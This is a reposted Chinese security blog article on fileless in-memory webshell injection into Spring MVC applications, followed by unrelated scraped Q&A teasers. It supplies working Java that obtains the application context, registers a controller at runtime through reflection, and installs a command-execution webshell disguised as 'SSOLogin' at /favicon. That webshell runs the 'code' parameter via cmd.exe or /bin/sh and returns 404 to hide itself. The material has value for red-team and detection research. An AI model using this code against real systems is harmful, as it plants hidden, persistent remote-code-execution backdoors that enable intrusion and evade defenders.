03.06 「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

2020-03-06 10:28:12 暗網視界

可領全套安全課程、配套攻防靶場


「乾貨」基於內存 Webshell 的無文件攻擊技術戰略


一. 情況介紹


紅隊人員在面對藍隊的嚴防死守與”盯梢”式的防禦策略時,傳統需要文件落地的攻擊技術往往會受到掣肘,基於 Web 的無文件攻擊技術逐漸成為 Web 安全的一種新的研究趨勢。


所以我們重點研究了基於 Java 的常用 Web 框架 — SpringMvc,並實現了利用多種不同的技術手段,往內存中注入惡意 Webshell 代碼的無文件攻擊技術。

「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

二. 必要知識


在切入正題前,首先需要了解下 Spring 框架中的幾個必要的名詞術語。


Bean


bean 是 Spring 框架的一個核心概念,它是構成應用程序的主幹,並且是由 Spring IoC 容器負責實例化、配置、組裝和管理的對象。


通俗來講:

  • bean 是對象
  • bean 被 IoC 容器管理
  • Spring 應用主要是由一個個的 bean 構成的


ApplicationContext


Spring 框架中,BeanFactory 接口是 Spring IoC容器 的實際代表者。

從下面的接口繼承關係圖中可以看出,ApplicationContext 接口繼承了 BeanFactory 接口,並通過繼承其他接口進一步擴展了基本容器的功能。

「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

因此,org.springframework.context.ApplicationContext接口也代表了 IoC容器 ,它負責實例化、定位、配置應用程序中的對象(bean)及建立這些對象間(beans)的依賴。


IoC容器通過讀取配置元數據來獲取對象的實例化、配置和組裝的描述信息。配置的零元數據可以用xml、Java註解或Java代碼來表示。


另外,如下圖,還有一堆各式各樣的 context 繼承了 ApplicationContext 接口,太繁雜不展開描述,僅供參考。


「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

ContextLoaderListener 與 DispatcherServlet


下面是一個典型 Spring 應用的 web.xml 配置示例:

<code><web-app>         xmlns="http://java.sun.com/xml/ns/javaee"
         xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"
         version="2.5">

    <display-name>HelloSpringMVC/<display-name>

    <context-param>
        <param-name>contextConfigLocation/<param-name>
        <param-value>/WEB-INF/applicationContext.xml/<param-value>
    /<context-param>

    <listener>
        <listener-class>org.springframework.web.context.ContextLoaderListener/<listener-class>
    /<listener>

    <servlet>
        <servlet-name>dispatcherServlet/<servlet-name>
        <servlet-class>org.springframework.web.servlet.DispatcherServlet/<servlet-class>
        <init-param>
            <param-name>contextConfigLocation/<param-name>
            <param-value>/WEB-INF/dispatcherServlet-servlet.xml/<param-value>
        /<init-param>
        <load-on-startup>1/<load-on-startup>
    /<servlet>

    <servlet-mapping>
        <servlet-name>dispatcherServlet/<servlet-name>
        <url-pattern>//<url-pattern>
    /<servlet-mapping>
/<web-app>
/<code>

在正式瞭解上面的配置前,先介紹下關於 Root Context 和 Child Context 的重要概念:


  • Spring 應用中可以同時有多個 Context,其中只有一個 Root Context,剩下的全是 Child Context
  • 所有Child Context都可以訪問在 Root Context中定義的 bean,但是Root Context無法訪問Child Context中定義的 bean
  • 所有的Context在創建後,都會被作為一個屬性添加到了 ServletContext中


ContextLoaderListener


ContextLoaderListener 主要被用來初始化全局唯一的Root Context,即 Root WebApplicationContext。


這個 Root WebApplicationContext 會和其他 Child Context 實例共享它的 IoC 容器,供其他 Child Context 獲取並使用容器中的 bean。


回到 web.xml 中,其相關配置如下:

<code><context-param>
    <param-name>contextConfigLocation/<param-name>
    <param-value>/WEB-INF/applicationContext.xml/<param-value>
/<context-param>

<listener>
    <listener-class>org.springframework.web.context.ContextLoaderListener/<listener-class> 

/<listener>
/<code>

依照規範,當沒有顯式配置 ContextLoaderListener 的 contextConfigLocation 時,程序會自動尋找 /WEB-INF/applicationContext.xml,作為配置文件,所以其實上面的 <context-param> 標籤對其實完全可以去掉。/<context-param>


DispatcherServlet


DispatcherServlet 的主要作用是處理傳入的web請求,根據配置的 URL pattern,將請求分發給正確的 Controller 和 View。


DispatcherServlet 初始化完成後,會創建一個普通的 Child Context 實例。


從下面的繼承關係圖中可以發現: DispatcherServlet 從本質上來講是一個 Servlet(擴展了 HttpServlet )。

「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

回到 web.xml 中,其相關配置如下:

<code><servlet>
    <servlet-name>dispatcherServlet/<servlet-name>
    <servlet-class>org.springframework.web.servlet.DispatcherServlet/<servlet-class>
    <init-param>
        <param-name>contextConfigLocation/<param-name>
        <param-value>/WEB-INF/dispatcherServlet-servlet.xml/<param-value>
    /<init-param>
    <load-on-startup>1/<load-on-startup>
/<servlet>
/<code>

上面給 org.springframework.web.servlet.DispatcherServlet 類設置了個別名 dispatcherServlet ,並配置了它的 contextConfigLocation 參數值為 /WEB-INF/dispatcherServlet-servlet.xml。


依照規範,當沒有顯式配置 contextConfigLocation 時,程序會自動尋找 /WEB-INF/<servlet-name>-servlet.xml,作為配置文件。/<servlet-name>


因為上面的 <servlet-name> 是 dispatcherServlet,所以當沒有顯式配置時,程序依然會自動找到 /WEB-INF/dispatcherServlet-servlet.xml 配置文件。/<servlet-name>


綜上,可以瞭解到:每個具體的 DispatcherServlet 創建的是一個 Child Context,代表一個獨立的 IoC 容器;而 ContextLoaderListener 所創建的是一個 Root Context,代表全局唯一的一個公共 IoC 容器。


如果要訪問和操作 bean ,一般要獲得當前代碼執行環境的IoC 容器 代表者 ApplicationContext。

三. 技術要點


  • Q: spring 內存注入 Webshell,要達到什麼樣的效果?


  • A: 一言以蔽之:在執行完一段 java 代碼後,可通過正常的 URL 訪問到內存中的 Webshell 獲得回顯即可。

在經過一番文檔查閱和源碼閱讀後,發現可能有不止一種方法可以達到以上效果。其中通用的技術點主要有以下幾個:

  1. 在不使用註解和修改配置文件的情況下,使用純 java 代碼來獲得當前代碼運行時的上下文環境;
  2. 在不使用註解和修改配置文件的情況下,使用純 java 代碼在上下文環境中手動註冊一個 controller;
  3. controller 中寫入 Webshell 邏輯,達到和 Webshell 的 URL 進行交互回顯的效果;

四. 技術實現


獲得當前代碼運行時的上下文環境


方法一:getCurrentWebApplicationContext

<code>WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());
/<code>

如下圖, getCurrentWebApplicationContext 獲得的是一個 XmlWebApplicationContext 實例類型的 Root WebApplicationContext。


注意這裡及下面實現方法中的 Root WebApplicationContext 都是後文的一個伏筆。


「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

方法二:WebApplicationContextUtils


<code>WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());
/<code>

通過這種方法獲得的也是一個 Root WebApplicationContext 。


此方法看起來比較麻煩,其實拆分起來比較容易理解,主要是用 WebApplicationContextUtils的

<code>WebApplicationContext context = RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());
/<code>

方法來獲得當前上下文環境。其中 WebApplicationContextUtils.getWebApplicationContext 函數也可以用 WebApplicationContextUtils.getRequiredWebApplicationContext來替換。

剩餘部分代碼,都是用來獲得 ServletContext 類的一個實例。仔細研究後可以發現,上面的代碼完全可以簡化成方法三中的代碼。


方法三:RequestContextUtils

<code>WebApplicationContext context = RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());
/<code>

上面的代碼使用 RequestContextUtils 的 

<code>public static WebApplicationContext getWebApplicationContext(ServletRequest request)
/<code>

方法,通過 ServletRequest 類的實例來獲得 WebApplicationContext 。


如下圖,可以發現此方法獲得的是一個名叫 dispatcherServlet-servlet 的 Child WebApplicationContext。


這個 dispatcherServlet-servlet 其實是上面配置中 dispatcherServlet-servlet.xml 的文件名。


「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

進一步分析,代碼中有個 RequestContextHolder.currentRequestAttributes() ,在前置知識中已經提到過

所有的Context在創建後,都會被作為一個屬性添加到了 ServletContext中


然後如下圖,查看當前所有的 attributes,發現確實保存有 Context 的屬性名。


其中 org.springframework.web.servlet.DispatcherServlet.CONTEXT 和 org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE 屬性名中都存放著一個名叫 dispatcherServlet-servlet 的 Child WebApplicationContext 。


「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

方法四:getAttribute

<code>WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
/<code>

從方法三的分析來看,其實完全可以將存放在 ServletContext 屬性中的 Context 取出來直接使用。


在閱讀相關源碼後發現,上面代碼中的 currentRequestAttributes() 替換成 getRequestAttributes() 也同樣有效;getAttribute 參數中的 0代表從當前 request 中獲取而不是從當前的 session 中獲取屬性值。


因此,使用以上代碼也可以獲得一個名叫 dispatcherServlet-servlet 的 Child WebApplicationContext。


手動註冊 controller


一個正常的 Controller 示例代碼如下,當用瀏覽器訪問 /hello 路徑時,會在定義好的 View 中輸出 hello World 字樣。

<code>@Controller
public class HelloController {
    @RequestMapping(value = "/hello", method = RequestMethod.GET)
    public String hello(@RequestParam(value="name", required=false, defaultValue="World") String name, Model model) { 

        model.addAttribute("name", name);
        return "hello";
    }
}
/<code>

如下圖:Spring 3.2.5 處理 URL 映射相關的類都實現了 HandlerMapping 接口。

「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

Spring 2.5 開始到 Spring 3.1 之前一般使用 org.springframework.web.servlet.mvc.annotation.DefaultAnnotationHandlerMapping 映射器 ;


Spring 3.1 開始及以後一般開始使用新的 org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping 映射器來支持@Contoller和@RequestMapping註解。


當然,也有高版本依舊使用舊映射器的情況。因此正常程序的上下文中一般存在其中一種映射器的實例 bean。


又因版本不同和較多的接口等原因,手工註冊動態 controller 的方法不止一種。


方法一:registerMapping


在 spring 4.0 及以後,可以使用 registerMapping 直接註冊 requestMapping ,這是最直接的一種方式。


相關示例代碼和解釋如下:

<code>// 1. 從當前上下文環境中獲得 RequestMappingHandlerMapping 的實例 bean
RequestMappingHandlerMapping r = context.getBean(RequestMappingHandlerMapping.class);
// 2. 通過反射獲得自定義 controller 中唯一的 Method 對象
Method method = (Class.forName("me.landgrey.SSOLogin").getDeclaredMethods())[0];
// 3. 定義訪問 controller 的 URL 地址
PatternsRequestCondition url = new PatternsRequestCondition("/hahaha");
// 4. 定義允許訪問 controller 的 HTTP 方法(GET/POST) 

RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
// 5. 在內存中動態註冊 controller
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
r.registerMapping(info, Class.forName("me.landgrey.SSOLogin").newInstance(), method);
/<code>

方法二:registerHandler


參考上面的 HandlerMapping 接口繼承關係圖,針對使用 DefaultAnnotationHandlerMapping 映射器的應用,可以找到它繼承的頂層類

<code>org.springframework.web.servlet.handler.AbstractUrlHandlerMapping
/<code>

進入查看代碼,發現其中有一個registerHandler 方法,摘錄關鍵部分如下:

<code>protected void registerHandler(String urlPath, Object handler) throws BeansException, IllegalStateException {
    ...
    Object resolvedHandler = handler;
    if (!this.lazyInitHandlers && handler instanceof String) {
        String handlerName = (String)handler;
        if (this.getApplicationContext().isSingleton(handlerName)) {
            resolvedHandler = this.getApplicationContext().getBean(handlerName);
        }
    }
    Object mappedHandler = this.handlerMap.get(urlPath);
    if (mappedHandler != null) {
        if (mappedHandler != resolvedHandler) {
            throw new IllegalStateException("Cannot map " + this.getHandlerDescription(handler) + " to URL path [" + urlPath + "]: There is already " + this.getHandlerDescription(mappedHandler) + " mapped.");
    ...
    } else {
        this.handlerMap.put(urlPath, resolvedHandler);
        if (this.logger.isInfoEnabled()) {
            this.logger.info("Mapped URL path [" + urlPath + "] onto " + this.getHandlerDescription(handler));
        }
    }
}
/<code>

該方法接受 urlPath參數和 handler參數,可以在 this.getApplicationContext() 獲得的上下文環境中尋找名字為 handler 參數值的 bean, 將 url 和 controller 實例 bean 註冊到 handlerMap 中。


相關示例代碼和解釋如下:

<code>// 1. 在當前上下文環境中註冊一個名為 dynamicController 的 Webshell controller 實例 bean
context.getBeanFactory().registerSingleton("dynamicController", Class.forName("me.landgrey.SSOLogin").newInstance());
// 2. 從當前上下文環境中獲得 DefaultAnnotationHandlerMapping 的實例 bean
org.springframework.web.servlet.mvc.annotation.DefaultAnnotationHandlerMapping  dh = context.getBean(org.springframework.web.servlet.mvc.annotation.DefaultAnnotationHandlerMapping.class);
// 3. 反射獲得 registerHandler Method
java.lang.reflect.Method m1 = org.springframework.web.servlet.handler.AbstractUrlHandlerMapping.class.getDeclaredMethod("registerHandler", String.class, Object.class);
m1.setAccessible(true);
// 4. 將 dynamicController 和 URL 註冊到 handlerMap 中
m1.invoke(dh, "/favicon", "dynamicController");
/<code>

方法三:detectHandlerMethods


參考上面的 HandlerMapping 接口繼承關係圖,針對使用 RequestMappingHandlerMapping 映射器的應用,可以找到它繼承的頂層類

<code>org.springframework.web.servlet.handler.AbstractHandlerMethodMapping
/<code>

進入查看代碼,發現其中有一個detectHandlerMethods 方法,代碼如下:

<code>protected void detectHandlerMethods(Object handler) {
    Class> handlerType = handler instanceof String ? this.getApplicationContext().getType((String)handler) : handler.getClass();
    final Class> userType = ClassUtils.getUserClass(handlerType); 

    Set<method> methods = HandlerMethodSelector.selectMethods(userType, new MethodFilter() {
        public boolean matches(Method method) {
            return AbstractHandlerMethodMapping.this.getMappingForMethod(method, userType) != null;
        }
    });
    Iterator var6 = methods.iterator();
    while(var6.hasNext()) {
        Method method = (Method)var6.next();
        T mapping = this.getMappingForMethod(method, userType);
        this.registerHandlerMethod(handler, method, mapping);
    }
}
/<method>/<code>

該方法僅接受handler參數,同樣可以在 this.getApplicationContext() 獲得的上下文環境中尋找名字為 handler 參數值的 bean, 並註冊 controller 的實例 bean。


示例代碼如下:

<code>context.getBeanFactory().registerSingleton("dynamicController", Class.forName("me.landgrey.SSOLogin").newInstance());
org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping.class);
java.lang.reflect.Method m1 = org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.class.getDeclaredMethod("detectHandlerMethods", Object.class);
m1.setAccessible(true);
m1.invoke(requestMappingHandlerMapping, "dynamicController");
/<code>

controller 中的 Webshell 邏輯


在使用 registerMapping 動態註冊 controller 時,不需要強制使用 @RequestMapping 註解定義 URL 地址和 HTTP 方法,其餘兩種手動註冊 controller 的方法都必須要在 controller 中使用@RequestMapping 註解 。

除此之外,將 Webshell 的代碼邏輯寫在主要的 Controller 方法中即可。

下面提供一個簡單的用來執行命令回顯的 Webshell 代碼示例:

<code>package me.landgrey;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.PrintWriter;

@Controller
public class SSOLogin {

    @RequestMapping(value = "/favicon")
    public void login(HttpServletRequest request, HttpServletResponse response){
        try {
            String arg0 = request.getParameter("code");
            PrintWriter writer = response.getWriter();
            if (arg0 != null) {
                String o = "";
                java.lang.ProcessBuilder p;
                if(System.getProperty("os.name").toLowerCase().contains("win")){
                    p = new java.lang.ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
                }else{
                    p = new java.lang.ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});
                }
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next(): o;
                c.close();
                writer.write(o);
                writer.flush();
                writer.close();
            }else{
                response.sendError(404);
            }
        }catch (Exception e){
        }
    }
}
/<code>

代碼比較簡單,達到的效果是,當請求沒有攜帶指定的參數(code)時,返回 404 錯誤,當沒有經驗的人員檢查時


因為 Webshell 僅存在於內存中,直接訪問又是 404 狀態碼,所以很可能會認為 Webshell 不存在或者沒有異常了。

「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

「乾貨」基於內存 Webshell 的無文件攻擊技術戰略

五. 注意事項


不同的映射處理器


如下面的配置,當有些老舊的項目中使用舊式註解映射器時,上下文環境中沒有 RequestMappingHandlerMapping 實例的 bean,但會存在 DefaultAnnotationHandlerMapping 的實例 bean。

<code><bean>
<bean>
/<code>

Root Context 與 Child Context


上文展示的四種獲得當前代碼運行時的上下文環境的方法中,推薦使用後面兩種方法獲得 Child WebApplicationContext。


這是因為:根據習慣,在很多應用配置中註冊Controller 的 component-scan 組件都配置在類似的 dispatcherServlet-servlet.xml 中,而不是全局配置文件 applicationContext.xml 中。


這樣就導致 RequestMappingHandlerMapping 的實例 bean 只存在於 Child WebApplicationContext 環境中,而不是 Root WebApplicationContext 中。


上文也提到過,Root Context無法訪問Child Context中定義的 bean,所以可能會導致 Root WebApplicationContext 獲得不了 RequestMappingHandlerMapping 的實例 bean 的情況。


另外,在有些Spring 應用邏輯比較簡單的情況下,可能沒有配置 ContextLoaderListener 、也沒有類似 applicationContext.xml 的全局配置文件,只有簡單的 servlet 配置文件,這時候通過前兩種方法是獲取不到Root WebApplicationContext的。


應用場景


既然是通過執行 java 代碼內存注入 webshell,那麼一般需要通過 Spring 相關的代碼執行漏洞才可以利用,例如較為常見的 Java 反序列漏洞、普通的 JSP 文件 Webshell 轉換成無文件 Webshell等。

六. 演示


本文技術的具體實現已集成到實驗室內部的 Webshell 管理工具中,下面的動態圖片演示了在 SpringMvc 環境中向內存注入一個自定義 URL 的 Webshell 操作。


作者: LandGrey@觀星實驗室

轉載自: https://www.anquanke.com/post/id/198886


今天你知道了嗎

「乾貨」基於內存 Webshell 的無文件攻擊技術戰略


加群,黑客技術大咖在線解答(群號評論區見)

分享到:

閱讀更多 暗網視界 的文章

關鍵字: 黑客 技術 乾貨

相關文章:

剛剛工作的畢業生,一個月只有2000多,是不是太少了?

剛剛工作的畢業生,一個月只有2000多,是不是太少了?

剛剛:剛剛工作的畢業生,一個月只有2000多,是不是太少了? 根據你城市消費水平來看啊,還有你從事的工作,假如你在二三線城市做一份事業單位或者是編制類的工作,薪資水平是隨著你工作年限逐年增長的,而且在年終也有很多福利補貼待遇等等,算下來收入也是可觀的,再舉一個例:-畢業生 2000

為什麼只有edg賺錢?

為什麼只有edg賺錢?

電競行業作為一個新興產業,這幾年發展勢頭越來越好,IG戰隊,FPX戰隊先後奪得了s8-s9世界賽的冠軍,據俱樂部知情人士透露,除了國內的幾家豪門俱樂部之外,其他俱樂部基本都是虧錢在做的,當然EDG也是:-edg 賺錢:為什麼只有edg賺錢?

網上羅馬仕充電寶20000毫安的,參數怎麼很多樣?哪個是真的?

網上羅馬仕充電寶20000毫安的,參數怎麼很多樣?哪個是真的?

20000:網上羅馬仕充電寶20000毫安的,參數怎麼很多樣?哪個是真的? 天貓旗艦店,或者淘寶旗艦店,或者京東旗艦店肯定包真,質量好,再說可以官方驗證啊,不能圖那十塊五塊的便宜,畢竟一個充電寶要用好久呢,一兩年沒問題的。:-羅馬仕 馬仕 毫安

我們買的新商品房還沒有拿到房產證,怎麼轉賣最好?

我們買的新商品房還沒有拿到房產證,怎麼轉賣最好?

沒有取得房抄產證的房子可以轉讓。但如果確定無法取得房產證的,房產轉讓不受法律保襲護。一般情況下,只有取得房產證的房屋才能確定房屋產權人,才具有轉讓的條件。但如果房屋是合法取得的,以百後可以依法辦理度房:-轉賣 房產證 商品房 拿到:我們買的新商品房還沒有拿到房產證,怎麼轉賣最好?

為什麼突厥人可以成功復國?是大唐的刀不鋒利了麼?

為什麼突厥人可以成功復國?是大唐的刀不鋒利了麼?

鋒利 突厥人 你這樣說只能說明你對歷史非常不瞭解,我先用一句話概括突厥被大唐雄兵打的有多慘:三次滅國,背井離鄉,遠赴西亞,打不過,俺躲著你還不行嗎?突厥的意思是中間慫起的頭盔。其來歷已經不可靠,可能有著匈奴、鮮卑或:-復國 大唐:為什麼突厥人可以成功復國?是大唐的刀不鋒利了麼?

小高層16層高樓間距60米哪一層比較好?

小高層16層高樓間距60米哪一層比較好?

小高層 60:小高層16層高樓間距60米哪一層比較好? 首先需要明白,選擇層數居住與樓間距毫無關係,住在哪一層,肉眼看對面樓的距離,是相差不大的。設定樓間距60米,純粹是混淆視聽。其實,一幢樓的樓層總數確定的情況下,到底哪一層最佳?很簡單,取總層數乘以黃金:-樓間距 層高

金銀花盆栽好養嗎?怎麼養?

金銀花盆栽好養嗎?怎麼養?

金銀花可以盆栽,很好養的!金銀花,是忍冬科的常綠纏繞灌木,枝條柔韌修長,多攀爬或匍匐生長。金銀花生性強健,在我國的很多南方省份野外很多地區都能看到它的身影,葉子常年翠綠,到夏季開花,飄香四溢。所以,有:-金銀花 盆栽:金銀花盆栽好養嗎?怎麼養?

長城對於抵禦古代匈奴和蒙古人起到了多大作用?

長城對於抵禦古代匈奴和蒙古人起到了多大作用?

長城真的無用嗎?在今天許多人認為長城無用,古代國家舉國之力建造的長城不過只是文物,就連康熙都曾作詩諷刺,原文如下:萬里經營到海涯,紛紛調發逐浮誇。當時用盡生民力,天下何曾屬爾家。-康熙但真的如此嗎?小:-匈奴 抵禦 長城:長城對於抵禦古代匈奴和蒙古人起到了多大作用? 蒙古人

什麼樹可以嫁接臘梅?

什麼樹可以嫁接臘梅?

臘梅只能嫁接在不同品種的臘梅上,其他的樹種不行!臘梅的繁殖可以用播種,壓條,嫁接,分株等繁殖方法。播種法因不易保持花卉的原有優良特性,且播種的優點是在於大量繁殖,而臘梅大都只需培植少量幾株,故一般都不:-臘梅 嫁接:什麼樹可以嫁接臘梅?

行情堪憂,還有多少教育機構的老師們五一假期有課上的?課時量多不多?

行情堪憂,還有多少教育機構的老師們五一假期有課上的?課時量多不多?

堪憂 五一 假期:行情堪憂,還有多少教育機構的老師們五一假期有課上的?課時量多不多? 事實上,因為教育培訓都是預收費用的模式。但凡有一點點規模的培訓機構老師。在上半年,帶課量是可以得到保證。:-課時量

在農村“立夏節”都有哪些民間習俗?

在農村“立夏節”都有哪些民間習俗?

民間習俗 農村:在農村“立夏節”都有哪些民間習俗? 在農村“立夏節”都有哪些民間習俗一、農村立夏常見的習俗風俗活動:1、吃雞蛋“立夏吃蛋”習俗由來已久,俗話說“立夏吃了蛋,夏天不疰夏”。據說立夏開始天氣越來越熱,村裡小孩兒會有身體疲勞四肢無力的感覺,吃:-立夏節

男朋友失望分手,但對我還有感覺,答應我兩個月之後可以在一起,我應該怎麼做,才能改變之前他對我的看法?

失望 分手 看法:男朋友失望分手,但對我還有感覺,答應我兩個月之後可以在一起,我應該怎麼做,才能改變之前他對我的看法? 你的這個問題特別的有趣,我覺得你先不要看你要怎麼做才讓他才能讓他對你的印象有所改變,你要去看為什麼是兩個月之後可以在一起,這兩個月他會用來做什麼,為什麼會有這兩個月?例如他的身體碰到了什麼樣的問題嗎?:-答應我

工程分包乙方人員傷殘誰承擔?

承擔:工程分包乙方人員傷殘誰承擔? 分包 乙方分包致人傷殘責任誰承擔?嚴格來說,需要了解更多傷殘原因才能區分的,作為非專業人士,自己發表一點淺見供題主參考:1、如果甲方是央企的話,他們合同中的責任、義務等條款內已經將自己的責任全部撇開了,更會:-乙方 傷殘

有哪些看起來毫不相關的兩個歷史人物實際上有過聯繫?

有哪些看起來毫不相關的兩個歷史人物實際上有過聯繫?

實際上:有哪些看起來毫不相關的兩個歷史人物實際上有過聯繫? 歷史人物 聯繫這個詞貌似太寬泛了,就好像有一個調皮的答案說的,胡亥和溥儀相隔2000多年,牽強的找,也有聯繫:都是亡國之君不是。我想題主的意思是兩個看起來應該風馬牛不相及的人物,在歷史上居然是熟悉或是一個時代的:-毫不相關

13年雪鐵龍世嘉自動擋7萬多公里,沒有水泡事故,多少錢能買?

法系車不保值,如果準備常開可以入手,性價比高,價格應該在二至三萬之間,二手車一車一況,一況一價,居體價格看車況。:-錢能 水泡:13年雪鐵龍世嘉自動擋7萬多公里,沒有水泡事故,多少錢能買? 世嘉 自動擋

22+吃土少女17年就有駕駛證了,今年才開始開車,想買個二手昂克賽拉,或者有什麼好建議嗎?

22+吃土少女17年就有駕駛證了,今年才開始開車,想買個二手昂克賽拉,或者有什麼好建議嗎?

17年 駕駛證 二手:22+吃土少女17年就有駕駛證了,今年才開始開車,想買個二手昂克賽拉,或者有什麼好建議嗎? 建議買日系二手車,開順了賣了,買新車,昂克賽拉無法再次出手時獲得好價格,而且也不省油,開完日系車直接換德系:-昂克賽拉

如何騎車去臺灣騎行?

如何騎車去臺灣騎行?

騎車 在臺灣沒有迴歸內地前,最好不要去臺灣,一是國內政策不允許你去臺灣,因為已停止了臺灣個人遊。二是你偷著去臺灣旅遊,安全沒有保障,偷渡客在哪裡也沒有安全保障的。以後內地政策允許個人去臺灣旅遊了,建議那時再:-騎行 臺灣:如何騎車去臺灣騎行?

本人預算5萬左右,想買一輛二手法系車!求推薦?

本人預算5萬左右,想買一輛二手法系車!求推薦?

預算:本人預算5萬左右,想買一輛二手法系車!求推薦? 5萬 預算5萬元左右,想買一輛二手法系車?推薦東風標緻老款308車型。1 5萬元可以買標緻308車況好的,沒大事故呢,年限15年左右,公里數3萬左右,手動檔車型。2 標緻308車型,底盤調教紮實,跑高速穩定:-法系 二手

14年進口馬自達5PK進口10年道奇酷威買哪個划算?

14年進口馬自達5PK進口10年道奇酷威買哪個划算?

道奇 你好,好高興回答你的問題!14年進口馬自達5和10年月道奇酷威個人感覺馬自達5比較划算。新車價馬5報價29.99萬,酷威19.38萬兩款車都是原裝進口,馬5屬於日系,酷威屬於美系。兩款車不屬於同類車型:-酷威 馬自達 14年:14年進口馬自達5PK進口10年道奇酷威買哪個划算?

2020年,河南教育行業國務院特殊津貼推薦,河南大學並列第三,大家怎麼看?

2020年,河南教育行業國務院特殊津貼推薦,河南大學並列第三,大家怎麼看?

特殊津貼 高校人才就要重視,河南省高校人才更要重視,這個人才不是評出了的,而是推薦出來的,沒有推薦,連參評的資格都沒有。國務院特殊津貼人員推薦,不推薦是百分百沒希望,推薦了希望就非常,那麼是什麼是國務院特殊津貼:-河南大學 並列 2020年:2020年,河南教育行業國務院特殊津貼推薦,河南大學並列第三,大家怎麼看?

本田CRV2019款1.5T舒適版油耗高嗎?

本田CRV2019款1.5T舒適版油耗高嗎?

李老貓說車為你非專業解答各種選車用車問題本田crv定位於一款緊湊級suv產品,主要對飈豐田榮放,日產奇駿,這款車整體市場表現非常突出,2019年全年累計銷量為18.44萬臺,平均月銷1.5萬以上,其深:-舒適版 本田 油耗:本田CRV2019款1.5T舒適版油耗高嗎?

國外疫情如果沒有得到有效控制,世界會發生什麼事情?頭腦風暴?

1.世界經濟遭到重創疫情影響之下,各行各業基本屬於停工停產的狀態,在世界經濟趨於一體化的今天,停工停產勢必會造成一系列的連鎖反應,最後導致的結果可能會引發金融危機。2.世界格局可能發生改變美國仍是世界:-頭腦風暴 控制:國外疫情如果沒有得到有效控制,世界會發生什麼事情?頭腦風暴? 疫情 國外

本田XRV這款車的整體表現怎麼樣?我想買1.5T自動豪華版,全款多少錢?

本田XRV這款車的整體表現怎麼樣?我想買1.5T自動豪華版,全款多少錢?

如果有15萬元的預算,讓你選擇一臺空間和動力都很不錯的小型SUV,我覺得很多的讀者都會想到本田XRV這款車型。因為本田XRV確實太出色了,和同級別的其他盒子SUV車型相比,這款車在空間和動力上都有優勢:-xrv 自動:本田XRV這款車的整體表現怎麼樣?我想買1.5T自動豪華版,全款多少錢? 本田 豪華版

現在存款有14萬,借了5萬還沒收回來,該做什麼好?

現在存款有14萬,借了5萬還沒收回來,該做什麼好?

何去何從:現在存款有14萬,借了5萬還沒收回來,該做什麼好? 續租 存款利息率較低,可以投資較高收益的項目,比如投資基金,一般情況下可獲得6%一10%的回報。如果行情好可達到50%以上收益,去年不少基金超過這目標。目前受疫情影響,股市在低位震盪,也是基金投資的機會。一:-存款 2300

2070super和5700xt買哪個比較好?

2070super和5700xt買哪個比較好?

如果是玩遊戲毫無疑問選擇n卡,也就是2070 suep。如果追求性價比可以選擇a卡,也就是5700xt. 為什麼遊戲選n卡呢?首先遊戲廠商針對n卡優化比較多,然後就是功耗小,然後N卡架構執行效率極高,:-:2070super和5700xt買哪個比較好?

生完二胎後,感覺自己有點抑鬱,總是想發火,特別煩躁,怎麼辦?

二胎 我是兩個孩子的媽媽,曾經的我和你一樣,生完寶寶我也抑鬱了,我知道抑鬱症真的很痛苦,產後的那段日子我整天都不開心,做什麼事也沒積極性,誰也不想搭理,別人給我說話我就覺得很煩。忍不住衝家人發脾氣。每當一個:-生完 抑鬱:生完二胎後,感覺自己有點抑鬱,總是想發火,特別煩躁,怎麼辦? 發火

人這一生遇到的人和事為什麼感覺都像是必然的經歷?

人這一生遇到的人和事為什麼感覺都像是必然的經歷?

感覺:人這一生遇到的人和事為什麼感覺都像是必然的經歷? 正所謂有因必有果,所以你今天的因,就會產生明天的果。所以這一切你就會覺得是必然的。生活中大部分是普通人大家的生活規律,生活方式,大致相同。當你看到別人家庭的果,自己家也產生同樣的果,你就會覺得這一切是:-人和 經歷

現在校內校外到底教的是美式英語還是英式英語還是混搭英語?

現在校內校外到底教的是美式英語還是英式英語還是混搭英語?

校內:現在校內校外到底教的是美式英語還是英式英語還是混搭英語? 校外 英式 答案肯定是不唯一的!美式英語現在是主流,少量英式發音也個別存在!但對於孩子來說,肯定是混搭英語,因為孩子肯定不是一直一位老師教下去,肯定會換老師!而老師的發音肯定是既有英式的,也有美式的!就連一些英語:-美式英語

上有老下有小,我們真的跳不出這個人生循環了嗎?

上有老下有小,我們真的跳不出這個人生循環了嗎?
